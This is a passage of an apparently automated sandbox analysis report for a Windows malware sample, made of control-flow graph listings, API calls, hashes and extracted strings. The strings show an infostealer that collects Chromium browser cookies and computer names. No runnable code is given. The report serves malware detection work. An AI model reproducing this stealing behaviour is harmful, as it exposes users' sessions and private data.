d08d50 2 API calls 16769->16770 16771 ce788f 16770->16771 17336 ce3a3b 17337 ce3a4a 17336->17337 17362 ced690 17337->17362 17339 ce3a50 17340 cd97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 17339->17340 17341 ce3a5a 17340->17341 17342 cedf50 6 API calls 17341->17342 17343 ce3a6c 17342->17343 17344 cd97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 17343->17344 17345 ce3a76 17344->17345 17346 cd97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 17345->17346 17347 ce3a95 17346->17347 17348 cf0220 LdrInitializeThunk 17347->17348 17349 ce3aaa 17348->17349 17350 cf0ca0 RtlAllocateHeap LdrInitializeThunk 17349->17350 17351 ce3ab3 17350->17351 17352 cf1160 LdrInitializeThunk 17351->17352 17353 ce3abc 17352->17353 17354 cd97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 17353->17354 17355 ce3ac6 17354->17355 17356 cf1eb0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 17355->17356 17357 ce3adb 17356->17357 17358 cd97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 17357->17358 17359 ce3ae5 17358->17359 17360 cf3410 RtlAllocateHeap 17359->17360 17361 ce3afa 17360->17361 17363 ced746 RtlExpandEnvironmentStrings 17362->17363 17364 ced710 17362->17364 17365 ced78b 17363->17365 17364->17363 17364->17364 17366 d03b50 RtlAllocateHeap 17365->17366 17367 ced79b RtlExpandEnvironmentStrings 17366->17367 17368 ced829 17367->17368 17369 d03b50 RtlAllocateHeap 17368->17369 17370 ced8c6 17369->17370 17370->17370 17371 d08d50 2 API calls 17370->17371 17372 ced937 17371->17372 16772 cf04b7 16774 cf04e9 16772->16774 16773 d093a0 LdrInitializeThunk 16773->16774 16774->16773 16775 d09500 RtlAllocateHeap LdrInitializeThunk 16774->16775 16776 cf089e 16774->16776 16778 cf0510 16774->16778 16779 cf07b5 16774->16779 16784 cf0997 16774->16784 16785 d09e50 16774->16785 16775->16774 16776->16776 16782 d03cc0 LdrInitializeThunk 16776->16782 16780 cf05d2 16778->16780 16783 d03cc0 LdrInitializeThunk 16778->16783 16779->16776 16781 d03cc0 LdrInitializeThunk 16779->16781 16781->16776 16782->16784 16783->16780 16787 d09e70 16785->16787 16786 d09f3e 16788 d03b50 RtlAllocateHeap 16786->16788 16791 d0a032 16786->16791 16787->16786 16789 d03cc0 LdrInitializeThunk 16787->16789 16790 d09f7d 16788->16790 16789->16786 16790->16791 16792 d03cc0 LdrInitializeThunk 16790->16792 16791->16774 16792->16791 17373 cee434 17374 cee3d0 17373->17374 17375 cee437 17373->17375 17376 d093a0 LdrInitializeThunk 17374->17376 17377 cee416 17376->17377 17378 ce6735 17379 ce676d 17378->17379 17380 d03b50 RtlAllocateHeap 17379->17380 17381 ce6acd 17380->17381 17381->17381 16793 ce45b2 16794 ce45c0 16793->16794 16795 d08ba0 2 API calls 16794->16795 16796 ce45fd 16795->16796
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00CED77D
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00CED7A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: -^$AV$SE$X&$[info] collected cookies file of the chromium-based browser$onqp$onqp
                                                      • API String ID: 237503144-3553015444
                                                      • Opcode ID: 33461e156dd3e16648e7e83a0eb3ff3000259e1ad85178ab11535c479804a5c6
                                                      • Instruction ID: 6e410ab04c3bb863d1ba04adda30ddea4812590f67b32a895365beafdadc8a9e
                                                      • Opcode Fuzzy Hash: 33461e156dd3e16648e7e83a0eb3ff3000259e1ad85178ab11535c479804a5c6
                                                      • Instruction Fuzzy Hash: D582A975608381DFD314CF19D89076BB7E2FB89314F198A2CE4999B390DB78D906CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 289 cf3943-cf4276 291 cf4278-cf427e call cd8700 289->291 292 cf4281-cf4323 call d08070 289->292 291->292 298 cf4378-cf4381 292->298 299 cf4325 292->299 301 cf439b-cf43a7 298->301 302 cf4383-cf4389 298->302 300 cf4330-cf4376 299->300 300->298 300->300 304 cf43bb-cf43e9 call cd8770 call d08070 301->304 305 cf43a9-cf43af 301->305 303 cf4390-cf4399 302->303 303->301 303->303 310 cf43ee-cf43f8 304->310 306 cf43b0-cf43b9 305->306 306->304 306->306 311 cf43fb-cf445d 310->311 312 cf445f 311->312 313 cf44a8-cf44b1 311->313 314 cf4460-cf44a6 312->314 315 cf44cb-cf44d7 313->315 316 cf44b3-cf44b9 313->316 314->313 314->314 317 cf44eb-cf44f9 call d08070 315->317 318 cf44d9-cf44df 315->318 319 cf44c0-cf44c9 316->319 322 cf44fe-cf456b GetComputerNameExA 317->322 320 cf44e0-cf44e9 318->320 319->315 319->319 320->317 320->320 323 cf456d-cf456f 322->323 324 cf45b2-cf45bb 322->324 325 cf4570-cf45b0 323->325 326 cf45bd-cf45c3 324->326 327 cf45db-cf45e7 324->327 325->324 325->325 328 cf45d0-cf45d9 326->328 329 cf45fb-cf4679 GetComputerNameExA 327->329 330 cf45e9-cf45ef 327->330 328->327 328->328 332 cf467b 329->332 333 cf46d2-cf46db 329->333 331 cf45f0-cf45f9 330->331 331->329 331->331 334 cf4680-cf46d0 332->334 335 cf46dd-cf46e3 333->335 336 cf46fb-cf4707 333->336 334->333 334->334 337 cf46f0-cf46f9 335->337 338 cf471b-cf4780 336->338 339 cf4709-cf470f 336->339 337->336 337->337 342 cf4782 338->342 343 cf47c0-cf47c9 338->343 340 cf4710-cf4719 339->340 340->338 340->340 344 cf4790-cf47be 342->344 345 cf47eb-cf47f7 343->345 346 cf47cb-cf47d1 343->346 344->343 344->344 347 cf480b-cf488a call d08070 345->347 348 cf47f9-cf47ff 345->348 349 cf47e0-cf47e9 346->349 354 cf488c-cf488f 347->354 355 cf48e9-cf48f2 347->355 350 cf4800-cf4809 348->350 349->345 349->349 350->347 350->350 356 cf4890-cf48e7 354->356 357 cf491d-cf491f 355->357 358 cf48f4-cf4902 355->358 356->355 356->356 360 cf4925-cf4933 357->360 359 cf4910-cf4919 358->359 359->359 361 cf491b 359->361 362 cf4958-cf4961 360->362 361->360 363 cf4967-cf496d 362->363 364 cf4a01-cf4a04 362->364 366 cf496f-cf4999 363->366 367 cf4940-cf4942 363->367 365 cf4a0a-cf4a50 364->365 368 cf4aa5-cf4ab0 365->368 369 cf4a52 365->369 370 cf499b-cf499e 366->370 371 cf49c0-cf49ce 366->371 372 cf4947-cf4952 367->372 375 cf4acb-cf4ace call cf9680 368->375 376 cf4ab2-cf4ab8 368->376 373 cf4a60-cf4aa3 369->373 370->371 374 cf49a0-cf49be 370->374 371->372 377 cf49d4-cf49fc 371->377 372->362 378 cf4a06-cf4a08 372->378 373->368 373->373 374->372 381 cf4ad3-cf4aef 375->381 379 cf4ac0-cf4ac9 376->379 377->372 378->365 379->375 379->379
                                                      APIs
                                                      • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00CF451D
                                                      • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00CF4618
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: +u7$Z8J*
                                                      • API String ID: 3545744682-3577212644
                                                      • Opcode ID: a562e759c0e3e368f165c1339b525536c1eb753a988221e9dbe7646fb0ced48a
                                                      • Instruction ID: e557af7c5d1ff8619ffc644897978f0f1b38957b4f8e531ed5fcd020126afd3d
                                                      • Opcode Fuzzy Hash: a562e759c0e3e368f165c1339b525536c1eb753a988221e9dbe7646fb0ced48a
                                                      • Instruction Fuzzy Hash: B7327E70544B468BD72ACB34C464BF3BBE1AF16308F48496CD1FB8B682D779A506CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 612 cf4084-cf4098 614 cf409a-cf40b3 612->614 615 cf40f4-cf40fd 612->615 616 cf40ff 614->616 617 cf40b5 614->617 618 cf4147-cf4148 615->618 621 cf4101-cf4108 616->621 620 cf40c0-cf40f0 617->620 619 cf4150-cf4159 618->619 619->619 622 cf415b-cf41dd 619->622 620->620 623 cf40f2 620->623 624 cf410a-cf4115 621->624 625 cf4117-cf412d 621->625 627 cf41df 622->627 628 cf4228-cf4231 622->628 623->621 626 cf4130-cf4138 624->626 625->626 629 cf413a-cf413c 626->629 630 cf4140-cf4145 626->630 631 cf41e0-cf4226 627->631 632 cf424b-cf4257 628->632 633 cf4233-cf4239 628->633 629->618 636 cf413e 629->636 630->618 631->628 631->631 634 cf426b-cf4276 632->634 635 cf4259-cf425f 632->635 637 cf4240-cf4249 633->637 640 cf4278-cf427e call cd8700 634->640 641 cf4281-cf4323 call d08070 634->641 638 cf4260-cf4269 635->638 636->622 637->632 637->637 638->634 638->638 640->641 647 cf4378-cf4381 641->647 648 cf4325 641->648 650 cf439b-cf43a7 647->650 651 cf4383-cf4389 647->651 649 cf4330-cf4376 648->649 649->647 649->649 653 cf43bb-cf43e9 call cd8770 call d08070 650->653 654 cf43a9-cf43af 650->654 652 cf4390-cf4399 651->652 652->650 652->652 659 cf43ee-cf43f8 653->659 655 cf43b0-cf43b9 654->655 655->653 655->655 660 cf43fb-cf445d 659->660 661 cf445f 660->661 662 cf44a8-cf44b1 660->662 663 cf4460-cf44a6 661->663 664 cf44cb-cf44d7 662->664 665 cf44b3-cf44b9 662->665 663->662 663->663 666 cf44eb-cf44f9 call d08070 664->666 667 cf44d9-cf44df 664->667 668 cf44c0-cf44c9 665->668 671 cf44fe-cf456b GetComputerNameExA 666->671 669 cf44e0-cf44e9 667->669 668->664 668->668 669->666 669->669 672 cf456d-cf456f 671->672 673 cf45b2-cf45bb 671->673 674 cf4570-cf45b0 672->674 675 cf45bd-cf45c3 673->675 676 cf45db-cf45e7 673->676 674->673 674->674 677 cf45d0-cf45d9 675->677 678 cf45fb-cf4679 GetComputerNameExA 676->678 679 cf45e9-cf45ef 676->679 677->676 677->677 681 cf467b 678->681 682 cf46d2-cf46db 678->682 680 cf45f0-cf45f9 679->680 680->678 680->680 683 cf4680-cf46d0 681->683 684 cf46dd-cf46e3 682->684 685 cf46fb-cf4707 682->685 683->682 683->683 686 cf46f0-cf46f9 684->686 687 cf471b-cf4780 685->687 688 cf4709-cf470f 685->688 686->685 686->686 691 cf4782 687->691 692 cf47c0-cf47c9 687->692 689 cf4710-cf4719 688->689 689->687 689->689 693 cf4790-cf47be 691->693 694 cf47eb-cf47f7 692->694 695 cf47cb-cf47d1 692->695 693->692 693->693 696 cf480b-cf488a call d08070 694->696 697 cf47f9-cf47ff 694->697 698 cf47e0-cf47e9 695->698 703 cf488c-cf488f 696->703 704 cf48e9-cf48f2 696->704 699 cf4800-cf4809 697->699 698->694 698->698 699->696 699->699 705 cf4890-cf48e7 703->705 706 cf491d-cf491f 704->706 707 cf48f4-cf4902 704->707 705->704 705->705 709 cf4925-cf4933 706->709 708 cf4910-cf4919 707->708 708->708 710 cf491b 708->710 711 cf4958-cf4961 709->711 710->709 712 cf4967-cf496d 711->712 713 cf4a01-cf4a04 711->713 715 cf496f-cf4999 712->715 716 cf4940-cf4942 712->716 714 cf4a0a-cf4a50 713->714 717 cf4aa5-cf4ab0 714->717 718 cf4a52 714->718 719 cf499b-cf499e 715->719 720 cf49c0-cf49ce 715->720 721 cf4947-cf4952 716->721 724 cf4acb-cf4ace call cf9680 717->724 725 cf4ab2-cf4ab8 717->725 722 cf4a60-cf4aa3 718->722 719->720 723 cf49a0-cf49be 719->723 720->721 726 cf49d4-cf49fc 720->726 721->711 727 cf4a06-cf4a08 721->727 722->717 722->722 723->721 730 cf4ad3-cf4aef 724->730 728 cf4ac0-cf4ac9 725->728 726->721 727->714 728->724 728->728
                                                      APIs
                                                      • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00CF451D
                                                      • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00CF4618
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: P6D/
                                                      • API String ID: 3545744682-4117495492
                                                      • Opcode ID: 354c0106a4d25122a520fb8c801666b29956aea5a5d72824cd3402ff0690efcb
                                                      • Instruction ID: 13e3136bcf18f387666edce3a4e9d0567e9ad632580a33dc59fe4791a354fe88
                                                      • Opcode Fuzzy Hash: 354c0106a4d25122a520fb8c801666b29956aea5a5d72824cd3402ff0690efcb
                                                      • Instruction Fuzzy Hash: 84328E70504B868AD72ACF34C494BF3BBE1AF16309F48496CD1FB8B282D7796546CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 731 cf4087-cf4098 733 cf409a-cf40b3 731->733 734 cf40f4-cf40fd 731->734 735 cf40ff 733->735 736 cf40b5 733->736 737 cf4147-cf4148 734->737 740 cf4101-cf4108 735->740 739 cf40c0-cf40f0 736->739 738 cf4150-cf4159 737->738 738->738 741 cf415b-cf41dd 738->741 739->739 742 cf40f2 739->742 743 cf410a-cf4115 740->743 744 cf4117-cf412d 740->744 746 cf41df 741->746 747 cf4228-cf4231 741->747 742->740 745 cf4130-cf4138 743->745 744->745 748 cf413a-cf413c 745->748 749 cf4140-cf4145 745->749 750 cf41e0-cf4226 746->750 751 cf424b-cf4257 747->751 752 cf4233-cf4239 747->752 748->737 755 cf413e 748->755 749->737 750->747 750->750 753 cf426b-cf4276 751->753 754 cf4259-cf425f 751->754 756 cf4240-cf4249 752->756 759 cf4278-cf427e call cd8700 753->759 760 cf4281-cf4323 call d08070 753->760 757 cf4260-cf4269 754->757 755->741 756->751 756->756 757->753 757->757 759->760 766 cf4378-cf4381 760->766 767 cf4325 760->767 769 cf439b-cf43a7 766->769 770 cf4383-cf4389 766->770 768 cf4330-cf4376 767->768 768->766 768->768 772 cf43bb-cf445d call cd8770 call d08070 769->772 773 cf43a9-cf43af 769->773 771 cf4390-cf4399 770->771 771->769 771->771 780 cf445f 772->780 781 cf44a8-cf44b1 772->781 774 cf43b0-cf43b9 773->774 774->772 774->774 782 cf4460-cf44a6 780->782 783 cf44cb-cf44d7 781->783 784 cf44b3-cf44b9 781->784 782->781 782->782 785 cf44eb-cf456b call d08070 GetComputerNameExA 783->785 786 cf44d9-cf44df 783->786 787 cf44c0-cf44c9 784->787 791 cf456d-cf456f 785->791 792 cf45b2-cf45bb 785->792 788 cf44e0-cf44e9 786->788 787->783 787->787 788->785 788->788 793 cf4570-cf45b0 791->793 794 cf45bd-cf45c3 792->794 795 cf45db-cf45e7 792->795 793->792 793->793 796 cf45d0-cf45d9 794->796 797 cf45fb-cf4679 GetComputerNameExA 795->797 798 cf45e9-cf45ef 795->798 796->795 796->796 800 cf467b 797->800 801 cf46d2-cf46db 797->801 799 cf45f0-cf45f9 798->799 799->797 799->799 802 cf4680-cf46d0 800->802 803 cf46dd-cf46e3 801->803 804 cf46fb-cf4707 801->804 802->801 802->802 805 cf46f0-cf46f9 803->805 806 cf471b-cf4780 804->806 807 cf4709-cf470f 804->807 805->804 805->805 810 cf4782 806->810 811 cf47c0-cf47c9 806->811 808 cf4710-cf4719 807->808 808->806 808->808 812 cf4790-cf47be 810->812 813 cf47eb-cf47f7 811->813 814 cf47cb-cf47d1 811->814 812->811 812->812 815 cf480b-cf488a call d08070 813->815 816 cf47f9-cf47ff 813->816 817 cf47e0-cf47e9 814->817 822 cf488c-cf488f 815->822 823 cf48e9-cf48f2 815->823 818 cf4800-cf4809 816->818 817->813 817->817 818->815 818->818 824 cf4890-cf48e7 822->824 825 cf491d-cf491f 823->825 826 cf48f4-cf4902 823->826 824->823 824->824 828 cf4925-cf4933 825->828 827 cf4910-cf4919 826->827 827->827 829 cf491b 827->829 830 cf4958-cf4961 828->830 829->828 831 cf4967-cf496d 830->831 832 cf4a01-cf4a04 830->832 834 cf496f-cf4999 831->834 835 cf4940-cf4942 831->835 833 cf4a0a-cf4a50 832->833 836 cf4aa5-cf4ab0 833->836 837 cf4a52 833->837 838 cf499b-cf499e 834->838 839 cf49c0-cf49ce 834->839 840 cf4947-cf4952 835->840 843 cf4acb-cf4ace call cf9680 836->843 844 cf4ab2-cf4ab8 836->844 841 cf4a60-cf4aa3 837->841 838->839 842 cf49a0-cf49be 838->842 839->840 845 cf49d4-cf49fc 839->845 840->830 846 cf4a06-cf4a08 840->846 841->836 841->841 842->840 849 cf4ad3-cf4aef 843->849 847 cf4ac0-cf4ac9 844->847 845->840 846->833 847->843 847->847
                                                      APIs
                                                      • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00CF451D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: P6D/
                                                      • API String ID: 3545744682-4117495492
                                                      • Opcode ID: a973bb2a27a6c09080fd5f882e4d0b343c78e37b18e8b7502f125b8b41609dcd
                                                      • Instruction ID: 3663b7f4e7b1aded392c67e286d2701a83b3a06db829356b6ea8f659a2f7290b
                                                      • Opcode Fuzzy Hash: a973bb2a27a6c09080fd5f882e4d0b343c78e37b18e8b7502f125b8b41609dcd
                                                      • Instruction Fuzzy Hash: 2D327E70504B468AD729CF34C8A4BF3BBE1AF16309F48496CD1FB8B282D7796546CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 850 cd4740-cd4762 call cd86f0 853 cd4dfc-cd4e05 850->853 854 cd4768-cd47c6 850->854 855 cd47cd-cd47d5 call cd86f0 854->855 856 cd47c8 854->856 858 cd47da-cd47e3 855->858 856->855 859 cd47e9-cd47fe 858->859 860 cd4c45-cd4c4e call cd8700 858->860 861 cd4811-cd481a 859->861 860->853 863 cd481c-cd4821 861->863 864 cd4850-cd4854 861->864 866 cd4800 863->866 867 cd4823-cd4827 863->867 868 cd487e-cd4888 864->868 869 cd4802-cd480b 866->869 870 cd4834-cd483c 867->870 868->869 869->861 871 cd488d-cd4894 869->871 872 cd483e-cd4843 870->872 873 cd4830-cd4832 870->873 874 cd489b-cd49e2 call cd8770 * 3 871->874 875 cd4896 871->875 872->873 873->870 876 cd4860-cd486f call cd8710 873->876 886 cd49e8-cd49fb 874->886 887 cd4a71-cd4a8e call cd2fd0 874->887 875->874 876->866 882 cd4871-cd4879 876->882 882->868 889 cd4a43-cd4a6b call cd2fd0 886->889 893 cd4a94-cd4c15 887->893 894 cd4c53-cd4c54 887->894 895 cd4a6d-cd4a6f 889->895 896 cd4a00-cd4a41 call cd2fd0 889->896 897 cd4c17-cd4c20 893->897 898 cd4c76-cd4cad 893->898 899 cd4d1e-cd4d34 call cd8700 * 2 894->899 895->896 896->887 896->889 902 cd4c34-cd4c3c 897->902 903 cd4c22 897->903 900 cd4caf 898->900 901 cd4d02-cd4d08 898->901 899->853 906 cd4cb0-cd4d00 900->906 907 cd4d39-cd4d3b 901->907 908 cd4d0a-cd4d0d 901->908 910 cd4c3e-cd4c43 902->910 911 cd4c30-cd4c32 902->911 909 cd4d13-cd4d1d 903->909 906->901 906->906 914 cd4db0-cd4df8 call cd8700 907->914 915 cd4d3d-cd4d5c 908->915 916 cd4d0f-cd4d11 908->916 909->899 910->911 911->902 917 cd4c59-cd4c65 call cd8710 911->917 914->853 920 cd4d5e-cd4d61 915->920 916->920 917->909 926 cd4c6b-cd4c73 917->926 920->914 924 cd4d63-cd4d67 920->924 927 cd4d70-cd4dae 924->927 926->898 927->914 927->927
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$IDAT$IEND$IHDR
                                                      • API String ID: 0-3181356877
                                                      • Opcode ID: 432f27838c2221ad48b6b5f99144d1c50eeec208672fe7cd41ec19289971b245
                                                      • Instruction ID: f8a3b3978aa336d57bb40fcef2c6a311442847c8eae388d788c0cfdb9e08f868
                                                      • Opcode Fuzzy Hash: 432f27838c2221ad48b6b5f99144d1c50eeec208672fe7cd41ec19289971b245
                                                      • Instruction Fuzzy Hash: CB120171A083848FD708CF29DC9076A7BE1EF85314F05852EEB958B392D779D909CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x
                                                      • API String ID: 0-2363233923
                                                      • Opcode ID: 75bb1baf44d269148fd6dee706543cad705d0b580efebbddfb85e2ff2389bac0
                                                      • Instruction ID: a5f6dc173e0164c680119e3c4a8e5b3a7aa56f2500c6f79d66e76ebeb0855abb
                                                      • Opcode Fuzzy Hash: 75bb1baf44d269148fd6dee706543cad705d0b580efebbddfb85e2ff2389bac0
                                                      • Instruction Fuzzy Hash: 8371A4B15087818FD324CF15C49176BBBE1AFD5308F588A2DE5DA87382D635D90ACB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: onqp
                                                      • API String ID: 0-1718216680
                                                      • Opcode ID: edcc8e633ed7c12b41e444cf35945a75fa8ade519c1f5a96ce22b15d163deb64
                                                      • Instruction ID: b00344684a0b2204947a13a150be97945940f58d7c9585676c2682a7f7158811
                                                      • Opcode Fuzzy Hash: edcc8e633ed7c12b41e444cf35945a75fa8ade519c1f5a96ce22b15d163deb64
                                                      • Instruction Fuzzy Hash: DAA102B15043418BDB24DF15C8A1B6BB3F5FF91714F19491CE8A68B391E334EA16CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(00D08D36,005C003F,00000006,00120089,?,00000018,82818087,00000000,00CE4B5A), ref: 00D03CED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
